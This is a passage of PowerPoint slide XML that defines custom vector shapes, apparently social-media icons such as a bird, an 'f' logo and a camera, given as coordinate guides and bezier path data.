                <a:gd name="connsiteY23" fmla="*/ 0 h 3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142" h="316007">
                  <a:moveTo>
                    <a:pt x="241139" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="265040" y="0"/>
                    <a:pt x="292051" y="14516"/>
                    <a:pt x="306633" y="31202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327151" y="29858"/>
                    <a:pt x="335397" y="19692"/>
                    <a:pt x="349699" y="10558"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="343170" y="29574"/>
                    <a:pt x="336047" y="54091"/>
                    <a:pt x="325569" y="59830"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340338" y="61437"/>
                    <a:pt x="353079" y="55334"/>
                    <a:pt x="366142" y="52395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361514" y="66282"/>
                    <a:pt x="342655" y="74263"/>
                    <a:pt x="334454" y="94697"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326254" y="115131"/>
                    <a:pt x="329982" y="126199"/>
                    <a:pt x="316939" y="174999"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296102" y="242622"/>
                    <a:pt x="276174" y="279635"/>
                    <a:pt x="184305" y="311458"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152057" y="320905"/>
                    <a:pt x="83508" y="315693"/>
                    <a:pt x="27716" y="295316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="281129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="268036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23178" y="266110"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63548" y="261698"/>
                    <a:pt x="90116" y="254801"/>
                    <a:pt x="108726" y="240807"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87700" y="241375"/>
                    <a:pt x="35310" y="244403"/>
                    <a:pt x="20535" y="200079"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37583" y="203299"/>
                    <a:pt x="59856" y="197334"/>
                    <a:pt x="70653" y="194871"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57204" y="189662"/>
                    <a:pt x="37595" y="181773"/>
                    <a:pt x="20899" y="168840"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="146258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="116697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14104" y="121836"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="23887" y="123910"/>
                    <a:pt x="33812" y="125203"/>
                    <a:pt x="40441" y="126434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9945" y="103325"/>
                    <a:pt x="-5039" y="60063"/>
                    <a:pt x="20722" y="8541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76047" y="73391"/>
                    <a:pt x="116697" y="97001"/>
                    <a:pt x="168525" y="104817"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166649" y="98530"/>
                    <a:pt x="164888" y="89662"/>
                    <a:pt x="165796" y="68430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166838" y="44047"/>
                    <a:pt x="190944" y="0"/>
                    <a:pt x="241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CDE015-9AA0-4BE4-A6D9-52CC6CFD2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9375" y="4197069"/>
              <a:ext cx="172150" cy="348350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst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432915 w 432915"/>
                <a:gd name="connsiteY2" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX3" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY3" fmla="*/ 455920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367184 w 432915"/>
                <a:gd name="connsiteY8" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 399197 w 432915"/>
                <a:gd name="connsiteY9" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 393797 w 432915"/>
                <a:gd name="connsiteY10" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY11" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY12" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 391059 w 432915"/>
                <a:gd name="connsiteY13" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 385514 w 432915"/>
                <a:gd name="connsiteY14" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY15" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY16" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY17" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY18" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY19" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY20" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY21" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY22" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 228151 w 432915"/>
                <a:gd name="connsiteY23" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 324674 w 432915"/>
                <a:gd name="connsiteY24" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX25" fmla="*/ 367184 w 432915"/>
                <a:gd name="connsiteY25" fmla="*/ 6 h 455920"/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313271 w 432915"/>
                <a:gd name="connsiteY2" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX3" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY3" fmla="*/ 455355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0 w 432915"/>
                <a:gd name="connsiteY8" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 367184 w 432915"/>
                <a:gd name="connsiteY9" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 399197 w 432915"/>
                <a:gd name="connsiteY10" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 393797 w 432915"/>
                <a:gd name="connsiteY11" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY12" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY13" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 391059 w 432915"/>
                <a:gd name="connsiteY14" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 385514 w 432915"/>
                <a:gd name="connsiteY15" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY16" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY17" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY18" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY19" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY20" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY21" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY22" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY23" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 228151 w 432915"/>
                <a:gd name="connsiteY24" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX25" fmla="*/ 324674 w 432915"/>
                <a:gd name="connsiteY25" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX26" fmla="*/ 367184 w 432915"/>
                <a:gd name="connsiteY26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355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0 w 399197"/>
                <a:gd name="connsiteY7" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX8" fmla="*/ 367184 w 399197"/>
                <a:gd name="connsiteY8" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 399197 w 399197"/>
                <a:gd name="connsiteY9" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 393797 w 399197"/>
                <a:gd name="connsiteY10" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY11" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY12" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 391059 w 399197"/>
                <a:gd name="connsiteY13" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 385514 w 399197"/>
                <a:gd name="connsiteY14" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY15" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY16" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY17" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY18" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY19" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY20" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY21" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY22" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 228151 w 399197"/>
                <a:gd name="connsiteY23" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 324674 w 399197"/>
                <a:gd name="connsiteY24" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX25" fmla="*/ 367184 w 399197"/>
                <a:gd name="connsiteY25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920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367184 w 399197"/>
                <a:gd name="connsiteY7" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX8" fmla="*/ 399197 w 399197"/>
                <a:gd name="connsiteY8" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 393797 w 399197"/>
                <a:gd name="connsiteY9" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY10" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY11" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 391059 w 399197"/>
                <a:gd name="connsiteY12" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 385514 w 399197"/>
                <a:gd name="connsiteY13" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY14" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY15" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY16" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY17" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY18" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY19" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY20" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY21" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228151 w 399197"/>
                <a:gd name="connsiteY22" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 324674 w 399197"/>
                <a:gd name="connsiteY23" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 367184 w 399197"/>
                <a:gd name="connsiteY24" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX0" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY0" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX1" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY1" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX2" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY2" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX3" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY3" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX4" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY4" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX5" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY5" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX6" fmla="*/ 193296 w 225309"/>
                <a:gd name="connsiteY6" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX7" fmla="*/ 225309 w 225309"/>
                <a:gd name="connsiteY7" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX8" fmla="*/ 219909 w 225309"/>
                <a:gd name="connsiteY8" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY9" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY10" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 217171 w 225309"/>
                <a:gd name="connsiteY11" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 211626 w 225309"/>
                <a:gd name="connsiteY12" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY13" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY14" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY15" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY16" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 0 w 225309"/>
                <a:gd name="connsiteY17" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 0 w 225309"/>
                <a:gd name="connsiteY18" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY19" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY20" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 54263 w 225309"/>
                <a:gd name="connsiteY21" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 150786 w 225309"/>
                <a:gd name="connsiteY22" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 193296 w 225309"/>
                <a:gd name="connsiteY23" fmla="*/ 6 h 45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309" h="455920">
                  <a:moveTo>
                    <a:pt x="139383" y="455355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="139383" y="455920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139383" y="455355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="54403" y="455920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54403" y="455355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="455920"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="193296" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204595" y="73"/>
                    <a:pt x="214144" y="770"/>
                    <a:pt x="225309" y="2823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225271" y="27274"/>
                    <a:pt x="222913" y="50194"/>
                    <a:pt x="219909" y="69600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188141" y="67117"/>
                    <a:pt x="138250" y="66776"/>
                    <a:pt x="139383" y="96177"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139383" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217171" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211626" y="215050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139383" y="216436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139383" y="455355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="455355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="216436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="90429"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="54356" y="90266"/>
                    <a:pt x="54310" y="90103"/>
                    <a:pt x="54263" y="89940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54393" y="21715"/>
                    <a:pt x="104084" y="2174"/>
                    <a:pt x="150786" y="971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168948" y="503"/>
                    <a:pt x="181997" y="-60"/>
                    <a:pt x="19329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5435E4-A5D2-465D-AC14-AC1BE0EA5AAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8105957" y="3478924"/>
              <a:ext cx="284621" cy="282605"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 249204 w 299575"/>
                <a:gd name="connsiteY0" fmla="*/ 123541 h 297454"/>
                <a:gd name="connsiteX1" fmla="*/ 241250 w 299575"/>
                <a:gd name="connsiteY1" fmla="*/ 136266 h 297454"/>
                <a:gd name="connsiteX2" fmla="*/ 229055 w 299575"/>
                <a:gd name="connsiteY2" fmla="*/ 198302 h 297454"/>
                <a:gd name="connsiteX3" fmla="*/ 116648 w 299575"/>
                <a:gd name="connsiteY3" fmla="*/ 234888 h 297454"/>
                <a:gd name="connsiteX4" fmla="*/ 59914 w 299575"/>
                <a:gd name="connsiteY4" fmla="*/ 135736 h 297454"/>
                <a:gd name="connsiteX5" fmla="*/ 58324 w 299575"/>
                <a:gd name="connsiteY5" fmla="*/ 125662 h 297454"/>
                <a:gd name="connsiteX6" fmla="*/ 36585 w 299575"/>
                <a:gd name="connsiteY6" fmla="*/ 125131 h 297454"/>
                <a:gd name="connsiteX7" fmla="*/ 31813 w 299575"/>
                <a:gd name="connsiteY7" fmla="*/ 137857 h 297454"/>
                <a:gd name="connsiteX8" fmla="*/ 31813 w 299575"/>
                <a:gd name="connsiteY8" fmla="*/ 247082 h 297454"/>
                <a:gd name="connsiteX9" fmla="*/ 51961 w 299575"/>
                <a:gd name="connsiteY9" fmla="*/ 266701 h 297454"/>
                <a:gd name="connsiteX10" fmla="*/ 150052 w 299575"/>
                <a:gd name="connsiteY10" fmla="*/ 266701 h 297454"/>
                <a:gd name="connsiteX11" fmla="*/ 250794 w 299575"/>
                <a:gd name="connsiteY11" fmla="*/ 266701 h 297454"/>
                <a:gd name="connsiteX12" fmla="*/ 269352 w 299575"/>
                <a:gd name="connsiteY12" fmla="*/ 250264 h 297454"/>
                <a:gd name="connsiteX13" fmla="*/ 269352 w 299575"/>
                <a:gd name="connsiteY13" fmla="*/ 134675 h 297454"/>
                <a:gd name="connsiteX14" fmla="*/ 261863 w 299575"/>
                <a:gd name="connsiteY14" fmla="*/ 123541 h 297454"/>
                <a:gd name="connsiteX15" fmla="*/ 249204 w 299575"/>
                <a:gd name="connsiteY15" fmla="*/ 123541 h 297454"/>
                <a:gd name="connsiteX16" fmla="*/ 151642 w 299575"/>
                <a:gd name="connsiteY16" fmla="*/ 88016 h 297454"/>
                <a:gd name="connsiteX17" fmla="*/ 89076 w 299575"/>
                <a:gd name="connsiteY17" fmla="*/ 147931 h 297454"/>
                <a:gd name="connsiteX18" fmla="*/ 150582 w 299575"/>
                <a:gd name="connsiteY18" fmla="*/ 208377 h 297454"/>
                <a:gd name="connsiteX19" fmla="*/ 212088 w 299575"/>
                <a:gd name="connsiteY19" fmla="*/ 148461 h 297454"/>
                <a:gd name="connsiteX20" fmla="*/ 151642 w 299575"/>
                <a:gd name="connsiteY20" fmla="*/ 88016 h 297454"/>
                <a:gd name="connsiteX21" fmla="*/ 234357 w 299575"/>
                <a:gd name="connsiteY21" fmla="*/ 29162 h 297454"/>
                <a:gd name="connsiteX22" fmla="*/ 203605 w 299575"/>
                <a:gd name="connsiteY22" fmla="*/ 60444 h 297454"/>
                <a:gd name="connsiteX23" fmla="*/ 235948 w 299575"/>
                <a:gd name="connsiteY23" fmla="*/ 92258 h 297454"/>
                <a:gd name="connsiteX24" fmla="*/ 268822 w 299575"/>
                <a:gd name="connsiteY24" fmla="*/ 59914 h 297454"/>
                <a:gd name="connsiteX25" fmla="*/ 268822 w 299575"/>
                <a:gd name="connsiteY25" fmla="*/ 53552 h 297454"/>
                <a:gd name="connsiteX26" fmla="*/ 245492 w 299575"/>
                <a:gd name="connsiteY26" fmla="*/ 29162 h 297454"/>
                <a:gd name="connsiteX27" fmla="*/ 234357 w 299575"/>
                <a:gd name="connsiteY27" fmla="*/ 29162 h 297454"/>
                <a:gd name="connsiteX28" fmla="*/ 41887 w 299575"/>
                <a:gd name="connsiteY28" fmla="*/ 0 h 297454"/>
                <a:gd name="connsiteX29" fmla="*/ 258217 w 299575"/>
                <a:gd name="connsiteY29" fmla="*/ 0 h 297454"/>
                <a:gd name="connsiteX30" fmla="*/ 299575 w 299575"/>
                <a:gd name="connsiteY30" fmla="*/ 41887 h 297454"/>
                <a:gd name="connsiteX31" fmla="*/ 299575 w 299575"/>
                <a:gd name="connsiteY31" fmla="*/ 255567 h 297454"/>
                <a:gd name="connsiteX32" fmla="*/ 257687 w 299575"/>
                <a:gd name="connsiteY32" fmla="*/ 297454 h 297454"/>
                <a:gd name="connsiteX33" fmla="*/ 149522 w 299575"/>
                <a:gd name="connsiteY33" fmla="*/ 297454 h 297454"/>
                <a:gd name="connsiteX34" fmla="*/ 41357 w 299575"/>
                <a:gd name="connsiteY34" fmla="*/ 297454 h 297454"/>
                <a:gd name="connsiteX35" fmla="*/ 0 w 299575"/>
                <a:gd name="connsiteY35" fmla="*/ 256096 h 297454"/>
                <a:gd name="connsiteX36" fmla="*/ 0 w 299575"/>
                <a:gd name="connsiteY36" fmla="*/ 41357 h 297454"/>
                <a:gd name="connsiteX37" fmla="*/ 41887 w 299575"/>
                <a:gd name="connsiteY37" fmla="*/ 0 h 29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9575" h="297454">
                  <a:moveTo>
                    <a:pt x="249204" y="123541"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="240190" y="123011"/>
                    <a:pt x="239659" y="128843"/>
                    <a:pt x="241250" y="136266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245492" y="158536"/>
                    <a:pt x="240720" y="179214"/>
                    <a:pt x="229055" y="198302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206255" y="234888"/>
                    <a:pt x="158536" y="250264"/>
                    <a:pt x="116648" y="234888"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83774" y="222692"/>
                    <a:pt x="50901" y="185577"/>
                    <a:pt x="59914" y="135736"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60444" y="132555"/>
                    <a:pt x="62565" y="127252"/>
                    <a:pt x="58324" y="125662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51431" y="122481"/>
                    <a:pt x="43477" y="123541"/>
                    <a:pt x="36585" y="125131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30222" y="126722"/>
                    <a:pt x="31813" y="133085"/>
                    <a:pt x="31813" y="137857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31813" y="174442"/>
                    <a:pt x="31813" y="210497"/>
                    <a:pt x="31813" y="247082"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31813" y="262989"/>
                    <a:pt x="35524" y="266701"/>
                    <a:pt x="51961" y="266701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84835" y="266701"/>
                    <a:pt x="117178" y="266701"/>
                    <a:pt x="150052" y="266701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183456" y="266701"/>
                    <a:pt x="217390" y="266701"/>
                    <a:pt x="250794" y="266701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262459" y="266701"/>
                    <a:pt x="269352" y="261929"/>
                    <a:pt x="269352" y="250264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269352" y="211558"/>
                    <a:pt x="269352" y="173382"/>
                    <a:pt x="269352" y="134675"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268822" y="126987"/>
                    <a:pt x="265773" y="124337"/>
                    <a:pt x="261863" y="123541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257952" y="122746"/>
                    <a:pt x="253180" y="123806"/>
                    <a:pt x="249204" y="123541"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="151642" y="88016"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116648" y="87486"/>
                    <a:pt x="89076" y="113997"/>
                    <a:pt x="89076" y="147931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89076" y="180805"/>
                    <a:pt x="117178" y="208377"/>
                    <a:pt x="150582" y="208377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183986" y="208377"/>
                    <a:pt x="212088" y="181335"/>
                    <a:pt x="212088" y="148461"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212088" y="115058"/>
                    <a:pt x="185577" y="88546"/>
                    <a:pt x="151642" y="88016"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="234357" y="29162"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207846" y="29162"/>
                    <a:pt x="204135" y="32873"/>
                    <a:pt x="203605" y="60444"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203605" y="90137"/>
                    <a:pt x="205195" y="92258"/>
                    <a:pt x="235948" y="92258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="267762" y="92258"/>
                    <a:pt x="268822" y="91197"/>
                    <a:pt x="268822" y="59914"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268822" y="57794"/>
                    <a:pt x="268822" y="55673"/>
                    <a:pt x="268822" y="53552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268822" y="35524"/>
                    <a:pt x="263519" y="29692"/>
                    <a:pt x="245492" y="29162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241781" y="29162"/>
                    <a:pt x="238069" y="29162"/>
